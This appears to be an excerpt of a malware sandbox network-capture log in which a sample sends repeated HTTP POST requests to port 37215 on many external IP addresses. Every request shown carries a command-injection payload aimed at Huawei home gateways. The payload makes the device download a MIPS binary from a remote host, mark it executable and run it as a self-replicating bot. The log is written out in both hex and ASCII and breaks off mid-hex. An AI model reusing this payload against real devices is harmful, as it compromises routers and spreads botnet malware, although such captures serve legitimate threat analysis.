                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1241192.168.2.1347264197.91.46.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528036118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1242192.168.2.135689641.193.24.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528079987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1243192.168.2.1349622157.161.183.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528109074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1244192.168.2.1346710197.210.145.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528196096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1245192.168.2.1344928219.153.59.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528352022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1246192.168.2.1335844157.37.28.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528390884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1247192.168.2.134541441.242.72.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528422117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1248192.168.2.1360526197.165.122.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528515100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1249192.168.2.1334930157.100.152.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528538942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1250192.168.2.1346776197.35.54.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.528563976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 